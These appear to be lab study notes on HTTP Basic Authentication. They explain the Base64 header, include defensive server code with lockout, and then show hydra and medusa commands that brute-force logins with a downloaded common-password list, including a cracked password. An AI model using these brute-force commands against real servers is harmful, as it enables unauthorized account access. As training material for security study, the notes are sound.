BASIC HTTP AUTHENTICATION
Basic Authentication is an authentication mechanism used to protect sensitive data and functionality in web applications. It is a challenge-response protocol in which a web server demands user credentials before granting access to protected resources. The process begins when a user attempts to access a restricted area. The server responds with a 401 Unauthorized status and a WWW-Authenticate header, prompting the user's browser to present a login dialog. Once the user provides their username and password, the browser concatenates them into a single string, separated by a colon. This string is then encoded using Base64 and included in the Authorization header of subsequent requests, following the format Basic <encodedCredentials>. The server decodes the credentials, verifies them against its database, and grants or denies access accordingly.
BASIC AUTHENTICATION GUI

WEB LOGIN FORM GUI

EXAMPLE HTTP GET BASIC AUTH
GET /protected_resource HTTP/1.1
Host: www.example.com
Authorization: Basic YWxpY2U6c2VjcmV0MTIz
root@oco:~$ echo -n YWxpY2U6c2VjcmV0MTIz | base64 -d
* alice:secret123
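The server side of the exchange above, as an added example that is not part of the original notes: it parses the Authorization header, compares credentials in constant time, and stops accepting guesses for a username after repeated failures. The user store, salt, realm name, lockout threshold and the 429 response are assumptions made for illustration.

```python
import base64
import binascii
import hashlib
import hmac

SALT = b"constructed-salt"   # constructed value; use a random per-user salt in practice
MAX_FAILURES = 5             # assumed lockout threshold
CHALLENGE = (401, {"WWW-Authenticate": 'Basic realm="protected", charset="UTF-8"'})


def kdf(password):
    """Slow password hash so a stolen store is expensive to crack."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


USERS = {"alice": kdf("secret123")}   # constructed store: username -> password hash
DUMMY = bytes(32)                     # compared against when the username is unknown
failures = {}                         # username -> consecutive failed attempts


def parse_basic(header):
    """Return (username, password) from an Authorization header value, or None."""
    if not header:
        return None
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Only the first colon separates the fields; the password may contain colons.
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def authenticate(header):
    """Return (status, response_headers) for one request."""
    creds = parse_basic(header)
    if creds is None:
        return CHALLENGE                  # missing or malformed header: ask for credentials
    user, password = creds
    if failures.get(user, 0) >= MAX_FAILURES:
        return (429, {})                  # locked out: further guesses are not evaluated
    stored = USERS.get(user, DUMMY)       # hash is computed even for unknown usernames
    if hmac.compare_digest(stored, kdf(password)) and user in USERS:
        failures.pop(user, None)
        return (200, {})
    failures[user] = failures.get(user, 0) + 1
    return CHALLENGE
```

A lockout keyed on the username alone lets anyone lock a known account; keying it on username plus client address, or using increasing delays, trades that off differently.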
HYDRA
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt
* The -s flag enables silent mode. It suppresses the progress bar and error messages, giving cleaner output.
root@htb:~$ hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.55.60 http-get / -s 43574
* [43574][http-get] host: 94.237.55.60 login: basic-auth-user password: Password@123
root@htb:~$ curl -u basic-auth-user:'Password@123' 94.237.55.60:43574
MEDUSA
root@oco:~$ nano web_servers.txt
...
root@oco:~$ nano usernames.txt
...
root@oco:~$ nano passwords.txt
...
root@oco:~$ medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET -t 64